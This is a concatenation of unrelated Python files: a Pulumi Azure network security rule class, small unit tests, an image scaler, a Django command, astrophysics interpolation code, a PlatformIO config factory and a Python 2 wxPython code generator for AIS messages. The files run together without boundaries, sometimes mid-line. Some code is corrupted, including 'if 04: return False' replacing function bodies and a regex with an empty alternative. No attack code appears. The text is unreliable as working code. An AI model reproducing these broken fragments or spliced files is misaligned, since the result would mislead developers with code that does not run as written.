Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _NetworkSecurityRuleState.__new__(_NetworkSecurityRuleState) __props__.__dict__["access"] = access __props__.__dict__["description"] = description __props__.__dict__["destination_address_prefix"] = destination_address_prefix __props__.__dict__["destination_address_prefixes"] = destination_address_prefixes __props__.__dict__["destination_application_security_group_ids"] = destination_application_security_group_ids __props__.__dict__["destination_port_range"] = destination_port_range __props__.__dict__["destination_port_ranges"] = destination_port_ranges __props__.__dict__["direction"] = direction __props__.__dict__["name"] = name __props__.__dict__["network_security_group_name"] = network_security_group_name __props__.__dict__["priority"] = priority __props__.__dict__["protocol"] = protocol __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["source_address_prefix"] = source_address_prefix __props__.__dict__["source_address_prefixes"] = source_address_prefixes __props__.__dict__["source_application_security_group_ids"] = source_application_security_group_ids __props__.__dict__["source_port_range"] = source_port_range __props__.__dict__["source_port_ranges"] = source_port_ranges return NetworkSecurityRule(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def access(self) -> pulumi.Output[str]: """ Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. """ return pulumi.get(self, "access") @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ A description for this rule. Restricted to 140 characters. """ return pulumi.get(self, "description") @property @pulumi.getter(name="destinationAddressPrefix") def destination_address_prefix(self) -> pulumi.Output[Optional[str]]: """ CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. """ return pulumi.get(self, "destination_address_prefix") @property @pulumi.getter(name="destinationAddressPrefixes") def destination_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. """ return pulumi.get(self, "destination_address_prefixes") @property @pulumi.getter(name="destinationApplicationSecurityGroupIds") def destination_application_security_group_ids(self) -> pulumi.Output[Optional[str]]: """ A List of destination Application Security Group ID's """ return pulumi.get(self, "destination_application_security_group_ids") @property @pulumi.getter(name="destinationPortRange") def destination_port_range(self) -> pulumi.Output[Optional[str]]: """ Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. """ return pulumi.get(self, "destination_port_range") @property @pulumi.getter(name="destinationPortRanges") def destination_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of destination ports or port ranges. This is required if `destination_port_range` is not specified. """ return pulumi.get(self, "destination_port_ranges") @property @pulumi.getter def direction(self) -> pulumi.Output[str]: """ The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. """ return pulumi.get(self, "direction") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. """ return pulumi.get(self, "name") @property @pulumi.getter(name="networkSecurityGroupName") def network_security_group_name(self) -> pulumi.Output[str]: """ The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. """ return pulumi.get(self, "network_security_group_name") @property @pulumi.getter def priority(self) -> pulumi.Output[int]: """ Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. """ return pulumi.get(self, "priority") @property @pulumi.getter def protocol(self) -> pulumi.Output[str]: """ Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). """ return pulumi.get(self, "protocol") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. """ return pulumi.get(self, "resource_group_name") @property @pulumi.getter(name="sourceAddressPrefix") def source_address_prefix(self) -> pulumi.Output[Optional[str]]: """ CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. """ return pulumi.get(self, "source_address_prefix") @property @pulumi.getter(name="sourceAddressPrefixes") def source_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. """ return pulumi.get(self, "source_address_prefixes") @property @pulumi.getter(name="sourceApplicationSecurityGroupIds") def source_application_security_group_ids(self) -> pulumi.Output[Optional[str]]: """ A List of source Application Security Group ID's """ return pulumi.get(self, "source_application_security_group_ids") @property @pulumi.getter(name="sourcePortRange") def source_port_range(self) -> pulumi.Output[Optional[str]]: """ Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. """ return pulumi.get(self, "source_port_range") @property @pulumi.getter(name="sourcePortRanges") def source_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of source ports or port ranges. This is required if `source_port_range` is not specified. """ return pulumi.get(self, "source_port_ranges") from unittest import TestCase from word_search_2 import Solution class TestFindWords(TestCase): def test_finds_subset_of_words(self): found_words = Solution().findWords( [ ['o', 'a', 'a', 'n'], ['e', 't', 'a', 'e'], ['i', 'h', 'k', 'r'], ['i', 'f', 'l', 'v'] ], ["oath", "pea", "eat", "rain"] ) self.assertEqual(2, len(found_words)) self.assertTrue("oath" in found_words) self.assertTrue("eat" in found_words) def test_single_word(self): self.assertEqual( ["a"], Solution().findWords( [["a"]], ["a"] ) ) task_test/date_helper_test.py ''' date helper unit test case @author: Huiyugeng ''' import unittest import datetime from task.trigger import date_helper class DateHelperTest(unittest.TestCase): def test_date_helper(self): '''next_seconds test''' _time = date_helper.next_seconds(10) _now = datetime.datetime.now() delta = (_time - _now).seconds self.assertEqual(int(round(delta)), 10) '''next_minutes test''' _time = date_helper.next_minutes(10) _now = datetime.datetime.now() delta = (_time - _now).seconds self.assertEqual(int(round(delta)), 10 * 60) '''next_hours test''' _time = date_helper.next_hours(10) _now = datetime.datetime.now() delta = (_time - _now).seconds self.assertEqual(int(round(delta)), 10 * 60 * 60) '''today test''' _time = date_helper.today() _now = datetime.date.today() self.assertEqual(_now.year, _time.year) self.assertEqual(_now.month, _time.month) self.assertEqual(_now.day, _time.day) '''next_days test''' _now = datetime.datetime.now() _time = date_helper.next_days(3, _now.hour, _now.minute, _now.second) delta = (_time - _now).days self.assertEqual(int(round(delta)), 2) 0 entradas = int(input()) for i in range(entradas): falantes = int(input()) lingua = "" for j in range(falantes): lingua += input() + " " linguas = set(lingua.strip().split(" ")) print("ingles") if len(linguas) > 1 else print(linguas.pop()) jembatan/pipeline/__init__.py0 from typing import Iterable from jembatan.core.spandex import JembatanDoc class SimplePipeline: """ Class wrapping common functions for processing document collections """ @classmethod def iterate(cls, collection: Iterable[JembatanDoc], stages: Iterable): """ Process Spandex collection Iterator over processed Spandexes. Useful if you want to work with the Spandex objects beyond just processing the pipeline. This is one way to instrument collection of results for evaluation without putting it into your pipeline. """ for jemdoc in collection: for stage in stages: stage.process(jemdoc) yield jemdoc @classmethod def iterate_by_stage(cls, collection: Iterable[JembatanDoc], stages: Iterable): for i, jemdoc in enumerate(collection): path = [] for stage in stages: path.append(str(stage)) stage.process(jemdoc) yield i, '/'.join(path), jemdoc @classmethod def run(cls, collection: Iterable[JembatanDoc], stages: Iterable): """ Executes a linear pipeline of stages and runs collection_process_complete on those stages """ for jemdoc in cls.iterate(collection, stages): pass for stage in stages: # allow annotators to do cleanup try: getattr(stage, 'collect_process_complete') stage.collection_process_complete() except AttributeError: pass #!/usr/bin/env python3 # -*- coding: utf-8 -*- import struct import sys from math import sqrt from PIL import Image MAX_SAMPLE_DIM = 32 * 1024 OUTPUT_SIZE = 300 CROP_FACTOR = .25 # Limits crop of longer dimension MAX_ASPECT = 2 # Limits aspect ratio def load_and_scale(image_path: str) -> Image.Image: try: with Image.open(image_path) as img: if getattr(img, 'is_animated', False): img.seek(img.n_frames - 1) # Last frame is a safe choice # pytype: disable=attribute-error if img is not None and (img.width > MAX_SAMPLE_DIM or img.height > MAX_SAMPLE_DIM): print( 'Image dimensions too large! {}x{} > {msd}x{msd}, file: {}'.format( img.width, img.height, image_path, msd=MAX_SAMPLE_DIM), file=sys.stderr, ) img = None else: img = img.convert('RGB') except (OSError, SyntaxError, Image.DecompressionBombError, struct.error) as e: print('Caught error loading {}: {}'.format(image_path, e), file=sys.stderr) img = None if img is None: print('Generating blank sample image due to unusable file', file=sys.stderr) return Image.new('RGB', (OUTPUT_SIZE, OUTPUT_SIZE)) # Black replacement image # Crop down longer dimension def lim(l: int, s: int) -> int: return max(round(l - CROP_FACTOR * sqrt(l * s)), s) w, h = img.size w_crop, h_crop = (lim(w, h), h) if w >= h else (w, lim(h, w)) h_inset, v_inset = round((w - w_crop) / 2), round((h - h_crop) / 2) img = img.crop((h_inset, v_inset, w - h_inset, h - v_inset)) # Nearest-neighbor aspect adjust def limar(l: int, s: int) -> int: return round(min(l, MAX_ASPECT * s)) w, h = img.size w_sc, h_sc = (limar(w, h), h) if w >= h else (w, limar(h, w)) img = img.resize((w_sc, h_sc), Image.NEAREST) # Bilinear proportional scale (w, h), l = img.size, max(*img.size) w_sc, h_sc = round(OUTPUT_SIZE * w / l), round(OUTPUT_SIZE * h / l) img = img.resize((w_sc, h_sc), Image.BILINEAR) # Paste onto background bg = Image.new(img.mode, (OUTPUT_SIZE, OUTPUT_SIZE), 'black') # pytype: disable=wrong-arg-types (w, h), l = img.size, max(*img.size) xoff, yoff = round((l - w) / 2), round((l - h) / 2) bg.paste(img, (xoff, yoff)) return bg if __name__ == '__main__': image_path, save_path = sys.argv[1:] img = load_and_scale(image_path) img.save(save_path, compress_level=1, exif=None) import machine adc = machine.ADC(0) adc.read() from django.core.management.base import BaseCommand, CommandError from geoinfo.models import GISLayerMaster from geoinfo.utils.layers import GeomParser class Command(BaseCommand): help = 'Manage geoinfo things.' def __init__(self, stdout=None, stderr=None, no_color=False): super(Command, self).__init__(stdout, stderr, no_color) def add_arguments(self, parser): parser.add_argument('--rebuild-layers', action='store_true', dest='rebuild_layers', default=False, help='Call GeomParser.process_geoinfo_to_layer() on every GISLayerMaster in the database') def handle(self, *args, **options): ''' :param args: :param options: :return: ''' layers_qs = None if options['rebuild_layers']: layers_qs = GISLayerMaster.objects.all() self.rebuild_layers(layers_qs) else: self.stdout.write("A valid option was not given. Exiting.") return def rebuild_layers(self, layers_qs): count = 1 for layer in layers_qs: try: gp = GeomParser(layer) gp.process_geoinfo_to_layer() except Exception as e: self.stdout.write("Exception occurred processing layer id: {}, layer title: {} : {}".format(layer.id, layer.name, str(e))) self.stdout.write("layers processed:{}".format(count)) count += 1 1-10 """ Deposition of energy from low-energy electrons As detailed in section III.F.2 of the paper, low-energy electrons (sub-3keV electrons) deposit their energy into the IGM through hydrogen/helium ionization, hydrogen excitation, heat, and continuum photons. To calculate how much energy is deposited into each channel we use the MEDEA results [1]_ as described in the paragraph before Eq. (45) of the paper. """ import sys sys.path.append("../..") import numpy as np import scipy.interpolate as interp import darkhistory.physics as phys import darkhistory.utilities as utils import os cwd = os.getcwd() abspath = os.path.abspath(__file__) dir_path = os.path.dirname(abspath) #dir_path = os.path.dirname(os.path.realpath(__file__)) def make_interpolator(interp_type='2D', cross_check=False): """Creates cubic splines that interpolate the Medea Data. Stores them in globally defined variables so that these functions are only computed once Assumes that the data files are in the same directory as this script. Parameters ---------- interp_type : {'1D', '2D'}, optional Returns the type of interpolation over the MEDEA data. Returns ------- Interpolator2D or function The interpolating function (takes x_e and electron energy) """ if cross_check: engs = np.array([14., 30, 60, 100, 300, 3000]) else: engs = np.array([10.2, 13.6, 14, 30, 60, 100, 300, 3000]) #print('AHHHHHH NOOOOOO!') grid_vals = np.zeros((26, len(engs), 5)) os.chdir(dir_path) # load MEDEA files for i, eng in enumerate(engs): with open('results-'+str(eng)+'ev-xH-xHe_e-10-yp024.dat','r') as f: lines_list = f.readlines() # load ionization levels only once if i==0: xes = np.array([float(line.split('\t')[0]) for line in lines_list[2:]]) # load deposition fractions for each energy grid_vals[:,i,:] = np.transpose(np.array([ [ #set 0 to 10^-15 to avoid -\infty # HL: changed to 1e-4 for consistency with Tracy max(float(line.split('\t')[k]),1e-4) for line in lines_list[2:] ] for k in [1,2,3,4,5] ])) os.chdir(cwd) if interp_type == '2D': MEDEA_interp = utils.Interpolator2D( xes, 'xes', engs, 'engs', grid_vals, logInterp=True ) elif interp_type == '1D': from scipy.interpolate import interp1d class Fake_Interpolator2D: def __init__( self, interp_log_xe_func ): self.interp_log_xe_func = interp_log_xe_func def get_vals(self, xe, eng): log_grid_vals = interp_log_xe_func(np.log(xe)) interp_log_eng_func = interp1d( np.log(engs), log_grid_vals, axis=0, bounds_error=False, fill_value=(log_grid_vals[0], log_grid_vals[-1]) ) return np.exp(interp_log_eng_func(np.log(eng))) interp_log_xe_func = interp1d( np.log(xes), np.log(grid_vals), axis=0 ) MEDEA_interp = Fake_Interpolator2D(interp_log_xe_func) else: raise TypeError('Invalid interp_type.') return MEDEA_interp def compute_fs(MEDEA_interp, spec_elec, xe, dE_dVdt_inj, dt): """ Given an electron energy spectrum, calculate how much of that energy splits into continuum photons, lyman_alpha transitions, H ionization, He ionization, and heating of the IGM. Parameters ---------- spec_elec : Spectrum object spectrum of low energy electrons. spec_elec.toteng() should return energy per baryon. xe : float The ionization fraction ne/nH. dE_dVdt_inj : float dE/dVdt, i.e. energy injection rate of DM per volume per time dt : float time in seconds over which these electrons were deposited. Returns ------- list of floats Ratio of deposited energy to a given channel over energy deposited by DM. The order of the channels is heat, lyman, ionH, ionHe, cont """ rs = spec_elec.rs #Fractions of energy being split off into each channel fracs_grid = MEDEA_interp.get_vals(xe, spec_elec.eng) #enforce that all functions sum to 1 fracs_grid /= np.sum(fracs_grid, axis=1)[:, np.newaxis] #compute ratio of deposited divided by injected norm_factor = phys.nB * rs**3 / (dt * dE_dVdt_inj) totengList = spec_elec.eng * spec_elec.N * norm_factor f_elec = np.array([ np.sum(totengList * fracs) for fracs in np.transpose(fracs_grid) ]) return np.array([f_elec[4], f_elec[1], f_elec[2], f_elec[3], f_elec[0]]) class gestureDetector: def __init__(self,name,detector,confidence_threshold,image_height,image_width): self.name = name self.confidence_threshold = confidence_threshold self.detector = detector self.image_height = image_height self.image_width = image_width print("Initialized {} with confidence threshold: {}".format(self.name,self.confidence_threshold)) def detect_image(self,imageInput): return bool , str , int , int , int# Copyright 2013 Velodyne Acoustics, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import shutil import zipfile import contextlib import os import tempfile import datetime def colorMapProperties(t): p = {} p['rgb_points'] = list(t.RGBPoints) if t.ColorSpace == 'HSV' and t.HSVWrap: p['color_space'] = 'WrappedHSV' else: p['color_space'] = t.ColorSpace p['number_of_values'] = t.NumberOfTableValues p['vector_component'] = t.VectorComponent return p def cameraProperties(view): p = {} p['focal_point'] = list(view.CameraFocalPoint) p['position'] = list(view.CameraPosition) p['view_up'] = list(view.CameraViewUp) p['view_angle'] = view.CameraViewAngle if view.CameraParallelProjection: p['parallel_scale'] = list(view.CameraParallelScale) return p def getObjectMetaData(rep): metaData = {} if rep.ColorArrayName: metaData['color_map'] = colorMapProperties(rep.LookupTable) metaData['color_by'] = rep.ColorArrayName[1] else: metaData['color'] = list(rep.DiffuseColor) return metaData def getSceneMetaData(view): scene = {} objects = [] scene['background_color'] = list(view.Background) if view.UseGradientBackground: # switch the ordering, paraview's Background2 means the top gradient color scene['background_color'] = list(view.Background2) scene['background_color2'] = list(view.Background) if view.BackgroundTexture: scene['background_image'] = exportTexture(view.BackgroundTexture, baseDir) scene['camera'] = cameraProperties(view) return scene def writeJsonData(outDir, view, rep, dataFilenames): scene = getSceneMetaData(view) objectMetaData = getObjectMetaData(rep) objectMetaData['point_size'] = 2 if len(dataFilenames) > 1: objectMetaData['filenames'] = dataFilenames objectMetaData['frames_per_second'] = 18 else: objectMetaData['filename'] = dataFilenames[0] scene['objects'] = [objectMetaData] jsonStr = json.dumps(scene, indent=4) sceneFile = os.path.join(outDir, 'scene.kiwi') open(sceneFile, 'w').write(jsonStr) def zipDir(inputDirectory, zipName): assert os.path.isdir(inputDirectory) inputDirectory = os.path.abspath(inputDirectory) parentDirectory = os.path.dirname(inputDirectory) + os.sep with contextlib.closing(zipfile.ZipFile(zipName, 'w', zipfile.ZIP_DEFLATED)) as archive: for root, dirs, files in os.walk(inputDirectory): for filename in files: absoluteFilename = os.path.join(root, filename) relativeFilename = absoluteFilename[len(parentDirectory):] archive.write(absoluteFilename, relativeFilename) import itertools import copy import pprint from pdb import set_trace as _breakpoint r_exclusive_groups = [("Water", "Building"),("UrbanPark","CropYield"),("ForestPlantation",)] r_mandatory = ["Trees","Herbs"] r_optional = ["Shrubs",] q_mandatory = ["Herbs", "Shrubs"] q_optional = ["Shrubs",] rmp = list(itertools.permutations(r_mandatory)) qmp = list(itertools.permutations(q_mandatory)) def generate_valid_permutations(mandatory_list, optional_list, exclusive_groups, greedy_mode = False): # elements in exclusive groups are mandatory in an exclusive way, one for each group and then permutated # actually, it's a set product, with one element for group exclusive_product_group = list(itertools.product(*exclusive_groups)) #print(exclusive_product_group) # mandatory elements must always be present, creating pseudo-groups mandatory_groups = [mandatory_list] apl = list(itertools.product(mandatory_groups,exclusive_product_group)) # these are the lists obtained combining mandatory elements with exclusive elements always_present_list = [list(itertools.chain(p1,p2)) for p1, p2 in apl] #print(always_present_list) # all permutations of these lists should be checked and computed ap_perm = [] if greedy_mode: for g in always_present_list: ap_perm.extend(list(itertools.permutations(g))) else: ap_perm = copy.copy(always_present_list) # this is the result #print(ap_perm) # now extending the list with optional elements, creating pseudo-groups optional_group = [(el,) for el in optional_list] # since these elements are optional, they can be matched as last resort only pc = list(itertools.product(ap_perm, optional_group)) #print(pc) #_breakpoint() permutations = copy.copy(ap_perm) additional_elements = [list(itertools.chain(p1,p2)) for p1, p2 in pc] permutations.extend(additional_elements) # now all permutations have been computed return permutations #return pc rmp = generate_valid_permutations(r_mandatory ,r_optional, r_exclusive_groups, greedy_mode = True) #qmp = generate_valid_permutations(q_mandatory, q_optional) pprint.pprint(rmp) pprint.pprint("number of permutations: {0}".format(len(rmp))) import re heroregex=re.compile(r'Batman|') mo1=heroregex.search('Batman and .') print(mo1.group()) mo1=heroregex.search(' and Batman') print(mo1.group()) batregex=re.compile(r'Bat(man|mobile|copter|bat|bug)') mo=batregex.search('Batmobile lost a wheel') print(mo.group()) print(mo.group(1))# Copyright (c) 2014-present PlatformIO <> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import importlib import re from platformio.debug.config.generic import GenericDebugConfig from platformio.debug.config.native import NativeDebugConfig class DebugConfigFactory(object): @staticmethod def get_clsname(name): name = re.sub(r"[^\da-z\_\-]+", "", name, flags=re.I) return "%s%sDebugConfig" % (name.upper()[0], name.lower()[1:]) @classmethod def new(cls, platform, project_config, env_name): board_config = platform.board_config( project_config.get("env:" + env_name, "board") ) tool_name = ( board_config.get_debug_tool_name( project_config.get("env:" + env_name, "debug_tool") ) if board_config else None ) config_cls = None try: mod = importlib.import_module("platformio.debug.config.%s" % tool_name) config_cls = getattr(mod, cls.get_clsname(tool_name)) except ModuleNotFoundError: config_cls = ( GenericDebugConfig if platform.is_embedded() else NativeDebugConfig ) return config_cls(platform, project_config, env_name) #!/usr/bin/env python __version__ = '$Revision: 4791 $'.split()[1] __date__ = '$Date: 2006-09-24 14:01:41 -0400 (Sun, 24 Sep 2006) $'.split()[1] __author__ = '' __doc__=''' Build a wxpython interface that uses the aisxmlbinmsg2py generated file to create a message string. aisxmlbinmsg2py was getting too long, so this functionality is completely broken out. @copyright: 2006 @license: Apache 2.0 @bug: FIX: Handle text fields @bug: FIX: deal with the name mangling flag in the xml? ''' import sys, os from lxml import etree def hasSubTag(et,subtag): ''' @return: true if the tag a sub tag with name subtag ''' if 04: return False if hasSubTag(field,'lookuptable'): return True return False def createChoiceList(o,fieldET): '''Create the wx.Choice list of entries''' lookup = fieldET.xpath('lookuptable')[0] name = fieldET.attrib['name'] fieldType = fieldET.attrib['type'] if fieldType == 'int': assert False # FIX: write me! elif fieldType == 'uint': o.write('\t'+name+'List = [\n') lastVal=0 for entry in lookup.xpath('entry'): entryKey = int(entry.attrib['key']) #print lastVal, entryKey, range(lastVal,entryKey) for i in range(lastVal,entryKey): o.write('\t\t\''+str(i)+'\',\n') lastVal = entryKey + 1 # Ready for the next key o.write('\t\t\''+str(entryKey)+' - '+entry.text+'\',\n') o.write('\t\t]\n') elif fieldType == 'bool': pass # Just one bool list else: print 'ERROR: not handling the choice for ',name,fieldType #assert False def generateWxPython(infile,outfile, prefixName=False,verbose=False): ''' @param infile: xml ais binary message definition file @param outfile: where to dump the python code ''' aisMsgsET = etree.parse(infile).getroot() o = file(outfile,'w') os.chmod(outfile,0755) print 'FIX: make the python command user selectable' o.write('''#!/usr/bin/env pythonw # mac specific # FIX: put some documentation here! import wx ''') #for msgET in aisMsgsET.xpath('message'): #o.write('#import '+msgET.attrib['name']+' \t# FIX: turn this back on\n') print 'FIX: make a more rebust determination of the module name' o.write('#import '+outfile.split('.')[0]+'\t# FIX: turn this back on\n') # FIX: NUKE THIS HACK... o.write(''' testParams = {'COG': 34.5, 'MessageID': 1, 'NavigationStatus': 3, 'PositionAccuracy': 1, 'Position_latitude': 37.424458333333334, 'Position_longitude': -122.16328055555556, 'RAIM': False, 'ROT': -2, 'RegionalReserved': 0, 'RepeatIndicator': 1, 'SOG': 101.9, 'Spare': 0, 'TimeStamp': 35, 'TrueHeading': 41, 'UserID': 1193046, 'slotoffset': 1221, 'syncstate': 2} ''') for msgET in aisMsgsET.xpath('message'): #if msgET.tag != 'message': continue print msgET.tag, msgET.attrib['name'] if len(msgET.xpath('include-struct')) > 0: sys.exit("ERROR: cannot handle xml that still has include-struct tags.\n Please use expandais.py.") buildWxPythonMsg(o,msgET,prefixName=prefixName,verbose=verbose) def buildWxPythonMsg(o,msgET, verbose=False, prefixName=False): ''' Write a class for the wx python. @param o: open file where resulting code will be written @param msgET: Element Tree starting at a message node TODO(schwehr):for lookuptable/entry values, make it also print the decoded value. TODO(schwehr):use a different name for message and field ''' assert(msgET.tag=='message') msgName = msgET.attrib['name'] className = 'MsgFrame' if prefixName: className = msgName+'MsgFrame' o.write('class '+className+'(wx.Frame):\n') o.write('''\t\'\'\' # FIX: write doc string here for the frame \'\'\' ''') for field in msgET.xpath('field'): if verbose: print 'Does field',field.attrib['name'],'use choice ...', if useChoice(field): createChoiceList(o,field) if verbose: print 'yes' elif verbose: print 'no' # All bools use the same lookup list if hasBoolField(msgET): o.write('\tBoolList=[\'False\',\'True\']\n') o.write(''' def __init__(self,parent,title,msgDict): \'\'\' @param msgDict: Default values to use. Overwritten with the return values. Values that are required will be ignored. @type msgDict: dict \'\'\' wx.Frame.__init__(self,parent,-1,title,size=(640,480)) # FIX: what size? self.msgDict = msgDict # Save this so we can edit and return valies in the incoming dict defaults = testParams # FIX: turn off this hack and use the unavailable values sizer=wx.FlexGridSizer(rows=1,cols=2, vgap=13, hgap=13) sizer.AddGrowableCol(1) self.SetSizer(sizer) ''') for field in msgET.xpath('field'): # FIX: does not cope with arrays of anything other than strings name = field.attrib['name'] fieldType = field.attrib['type'] numBits = int(field.attrib['numberofbits']) o.write('\n\t\t############################ Field '+name+' - '+fieldType+'\n') o.write('\t\ttxt = wx.StaticText(self,label=\''+name+'\')\n') if hasSubTag(field,'required'): o.write('\t\tself.'+name+'Widget=wx.StaticText(self,label=\''+field.xpath('required')[0].text+'\')\n') else: o.write('\t\tvalue=str(defaults[\''+name+'\'])\n') o.write('\t\tif \''+name+'\' in msgDict: value = str(msgDict[\''+name+'\'])\n') o.write('\t\tself.'+name+'Widget=') # Need to lookup what to do... if 'uint'==fieldType: if useChoice(field): o.write('wx.Choice(self,-1, choices = self.'+name+'List)\n') o.write('\t\tself.'+name+'Widget.SetSelection(int(value))\n') else: o.write('wx.SpinCtrl(self,value=value,min=0,max='+str(2**numBits - 1)+')\n') elif 'int'==fieldType: if useChoice(field): o.write('wx.Choice(self,-1, choices = self.'+name+'List)\n') # FIX: need to figure out how to select choices when they could be negative assert False else: o.write('wx.SpinCtrl(self,value=value,min='+str(2**(numBits-1))+',max='+str(2**(numBits-1) - 1)+')\n') elif 'bool'==fieldType: o.write('wx.Choice(self,-1, choices = self.BoolList)\n') o.write('\t\tif defaults[\''+name+'\']: self.'+name+'Widget.SetSelection(1)\n') o.write('\t\telse: self.'+name+'Widget.SetSelection(0)\n') elif fieldType in ['udecimal','decimal']: scale = float(field.xpath('scale')[0].text) if fieldType=='udecimal': o.write('wx.Slider(self,-1,float(value),0,'+str((2**numBits -1) / scale)) else: #print name, numBits #print 2**(numBits-1) start = '-'+str((2**(numBits-1)) / scale) end = str((2**(numBits-1) - 1) / scale) if hasSubTag(field,'range'): # FIX: need to also create a validator that allow min .. max plus the unavailable range = field.xpath('range')[0] start = float(range.attrib['min']) end = float(range.attrib['max']) if hasSubTag(field,'unavailable'): unavailable = float(field.xpath('unavailable')[0].text) if unavailable < start: start = unavailable if end < unavailable: end = unavailable #print 'decimal',start,end o.write('wx.Slider(self,-1,float(value),'+str(start)+','+str(end)) o.write(',style=wx.SL_HORIZONTAL|wx.SL_AUTOTICKS | wx.SL_LABELS)\n') else: print 'Please follow the GPS navigation system over the cliff',name,fieldType assert(False) o.write('\t\tdel value\n') o.write('\n') o.write('\t\tsizer.Add(item=txt); del txt\n') o.write('\t\tsizer.Add(self.'+name+'Widget,flag=wx.EXPAND)\n') o.write(''' ####### ####### FINISH UP __init__ ####### btnDone = wx.Button(self,label='Done') sizer.Add((1,35),0,wx.ADJUST_MINSIZE,0) sizer.Add(item=btnDone) btnDone.Bind(wx.EVT_BUTTON,self.OnDone) self.Layout() # Get yourself organized self.Show() def OnDone(self,evt): \'\'\' Put all values into msgDict so that they get returned to the caller \'\'\' ''') for field in msgET.xpath('field'): name = field.attrib['name'] fieldType = field.attrib['type'] if hasSubTag(field,'required'): # FIX: need to set the type right on the values if fieldType in ['int','uint']: o.write('\t\tself.msgDict[\''+name+'\']='+field.xpath('required')[0].text+'\n') else: print 'FIX: need to write this case!' assert False else: if fieldType in ['int','uint','bool','udecimal','decimal']: if useChoice(field): o.write('\t\tself.msgDict[\''+name+'\']=self.'+name+'Widget.GetSelection()\n') else: o.write('\t\tself.msgDict[\''+name+'\']=self.'+name+'Widget.GetValue()\n') elif fieldType in ['decimal','udecimal']: print 'FIX: what do I do about decimals?' o.write('\t\t#FIX: handle '+name+' '+fieldType+'\n') else: print 'FIX: need to write the other cases here', name, fieldType o.write('\t\t#FIX: handle '+name+' '+fieldType+'\n') assert False o.write('\t\tself.Close(True)\n') # FIX: put in command line interface here... # FIX: what if there is more than one message?? o.write(''' if __name__=='__main__': app = wx.PySimpleApp() theData={} frame = MsgFrame(None,\''''+msgName.capitalize()+''' Message Editor',theData) app.MainLoop() print 'finishing up', theData ''') ###################################################################### if __name__=='__main__': from optparse import OptionParser parser = OptionParser(usage="%prog [options]", version="%prog "+__version__) parser.add_option('-o','--output',dest='outputFileName',default=None, help='Name of the python file to 